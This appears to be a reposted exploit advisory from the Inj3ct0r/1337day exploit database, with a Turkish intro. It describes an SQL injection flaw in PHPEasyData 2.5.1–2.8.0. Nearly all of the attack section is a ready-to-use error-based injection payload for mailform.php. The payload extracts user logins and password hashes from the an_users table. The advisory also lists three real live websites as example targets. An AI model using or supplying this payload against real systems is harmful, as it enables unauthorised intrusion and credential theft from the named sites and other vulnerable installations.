PHPEasyData SQL Injection Vulnerability

PHPEasyData SQL Injection Açığı bulunmuş olup açığın oluşum yerleri ve exploit şu şekilde.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1 
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
1                  \ \____/ >> Exploit database separated by exploit   0 
0                   \/___/          type (local, remote, DoS, etc.)    1 
1                                                                      1 
0  [+] Site            : 1337day.com                                   0 
1  [+] Support e-mail  : submit[at]1337day.com                         1 
0                                                                      0 
1               #########################################              1 
0               I'm DaOne member from Inj3ct0r Team                    1 
1               #########################################              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
########################################## 
# Exploit Title: PHPEasyData SQL Injection Vulnerability 
# Date: 2012-10-28 
# Author: DaOne aka Mocking Bird 
# Home: 1337day Inj3ct0r Exploit Database  
# Software Link: http://phpeasydata.com/ 
# Category: webapps/php 
# Version: 2.5.1=>2.8.0 
########################################## 
 
# SQL Injection [POST Method] 
http://[host]/mailform.php  
Request Data(Error Based): annuaire=6&inf_id=5&message=3&myemail=aaa@aaa.com&submit_add=Valider+les+modifications&titre=3&validation=1&enr_id=-1+and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,user_login,0x3a,user_pass,0x3a) FROM an_users+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b) 
 
# Example: 
http://annuaire-discjockey.fr/annuaire/mailform.php 
http://www.macadi.fr/annonces/mailform.php 
http://www.gay-rhone-alpes.com/phpeasydata-pro-2.5.2/mailform.php 
 
 
---- 

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir